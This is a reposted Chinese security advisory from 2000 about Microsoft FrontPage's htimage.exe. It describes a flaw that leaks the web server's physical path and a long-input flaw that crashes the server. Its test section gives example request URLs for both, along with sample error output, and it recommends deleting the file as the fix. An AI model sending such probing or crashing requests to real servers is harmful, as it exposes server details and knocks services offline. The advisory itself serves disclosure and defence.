微软 Frontpage 中的htimage.exe泄漏Web服务器路…

发布日期：2000-04-21
更新日期：2000-04-21

受影响系统：

Microsoft FrontPage 98 Server
Extensions for PWS
Microsoft FrontPage Personal
WebServer 1.0 Microsoft FrontPage 98.0
- Microsoft Windows 98
- Microsoft Windows 95
- Microsoft Windows NT 4.0 Microsoft FrontPage 97.0
Microsoft FrontPage 1.1

描述：

---

htimage.exe 包含了 Frontpage 映象热点功能，进行普通操作时，
他传递一个地图名称和指定一个对应的热点在:
http: file://target/path/htimage.exe/mapname?x,y
如果输入一个不存在的mapname,htimage将返回一个出错信息，其中
将包含WebServer root的真实物理路径.

如果地图名长度超过了 741 或更多字节，将产生一个无效页面错误，
webserver 就会当掉,但此时操作系统仍会继续工作。

<* 来源： Narrow<narrow@hobbiton.org> *>


测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

1. 泄漏物理路经：
http://server/cgi-bin/htimage.exe/linux?0,0
如果linux并不是个真实存在的mapname,那么可能得到下列类似信息：
------------------------------------------------------------------------------------
Error


Error calling HTImage:


Picture config file not found, tried the following:


c:/interpub/webroot/linux/linux
------------------------------------------------------------------------------------

2. 当掉 server:

http: file://server/cgi-bin/htimage.exe/<741 characters>?0,0


建议：

---

临时解决办法： 删掉 htimage.exe

标签：

版权申明：本站文章部分自网络，如有侵权，请联系：west999com@outlook.com
特别注意：本站所有转载文章言论不代表本站观点，本站所提供的摄影照片，插画，设计作品，如需使用，请与原作者联系，版权归原作者所有